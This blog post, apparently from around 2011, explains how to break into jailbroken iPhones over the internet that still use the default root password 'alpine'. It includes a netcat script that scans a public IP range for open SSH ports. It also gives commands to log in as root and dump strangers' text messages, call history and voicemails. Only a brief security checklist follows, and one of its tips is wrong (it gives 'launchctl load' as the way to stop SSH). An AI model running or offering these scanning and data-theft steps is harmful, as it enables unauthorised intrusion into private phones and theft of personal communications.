How to access iPhones remotely using OpenSSH

A jail broken Apple iPhone with OpenSSH installed is accessible over the internet using ssh and the default root password “alpine“.

You can use a short script to find IP addresses that have port 22 open and try to login. You can run this script from your Mac or any Linux machine.

#!/bin/shfourth=1

third=0

mkdir -p /tmp/scan-iphones/open
mkdir /tmp/scan-iphones/closed

while [ "$third" -lt 192 ] ; do
while [ "$fourth" -lt 255 ] ; do
  if [ ! -f /tmp/scan-iphones/94.157."$third"."$fourth" ] ; then
   if [ ! -f /tmp/scan-iphones/open/94.157."$third"."$fourth" ] ; then
    if [ ! -f /tmp/scan-iphones/closed/94.157."$third"."$fourth" ] ; then
     if [ -f /tmp/scan-iphones/stop ] ; then
      echo "Stopping because /tmp/scan-iphone/stop exists."
      exit 1
     fi
     touch /tmp/scan-iphones/94.157."$third"."$fourth"
     nc -w 1 -z 94.157."$third"."$fourth" 22-22 > /dev/null 2>&1 && touch /tmp/scan-iphones/open/94.157."$third"."$fourth" || touch /tmp/scan-iphones/closed/94.157."$third"."$fourth"
     rm /tmp/scan-iphones/94.157."$third"."$fourth"
    fi
   fi
  fi
fourth=$(($fourth+1))
done
fourth=1
third=$(($third+1))
done

The IP-addresses of IP-addresses that have port 22 open are stored in /tmp/scan-iphones/open/*. Some of these IP-addresses are not iPhones, so not every IP-address listed there are vulnerable. To stop the script press [CTRL]+[c] or type touch /tmp/scan-iphones/stop. 

Now that you have IP addresses where you can login, use one of these “features”:

Read all text messages

From your Mac or any Linux machine, type:
$ ssh root@IP-ADDRESS-OF-IPHONE
# sqlite3 /private/var/mobile/Library/SMS/sms.db
SELECT * FROM message;

 

See the call history 

From your Mac or any Linux machine, type:
$ ssh root@IP-ADDRESS-OF-IPHONE
# sqlite3 /private/var/mobile/Library/CallHistory/call_history.db
SELECT * FROM call; 

Listen to voicemails

From your Mac or any Linux machine, type:
$ scp root@IP-ADDRESS-OF-IPHONE:/private/var/mobile/Library/Voicemail/*.amr .

Open the finder, drag the .amr files on Quicktime to listen to them. 

To secure your iPhone, you can use one or more of these measures:

• Change the “root” password - On the Terminal, type # passwd.
• Change the “mobile” password - On the Terminal, type # passwd mobile.
• Disable OpenSSH start at boot time - Don’t know how to do this yet.
• Stop OpenSSH for now - launchctl load -w /Library/LaunchDaemons/com.openssh.sshd.plist.
• Set “PermitRootLogin” to “No” - in /private/etc/ssh/sshd_config.
• If all fails: Uninstall OpenSSH - Using the tools that installed OpenSSH.

I found this Interesting Article on http://meinit.nl/howto-access-iphones-remotely-using-openssh

• Bio
• Latest Posts

Editor

Latest posts by Editor (see all)

• How to Show files by size, biggest last- Linux Commands - January 21, 2011
• How to test for unreadable blocks on disk- Linux Commands - January 21, 2011
• How to Do a read speed test on disk sda – Linux Commands - January 21, 2011

accesses, iphones, linux, logins, remote, ssh, voicemail, vulnerabilities

Linux, Tech Guru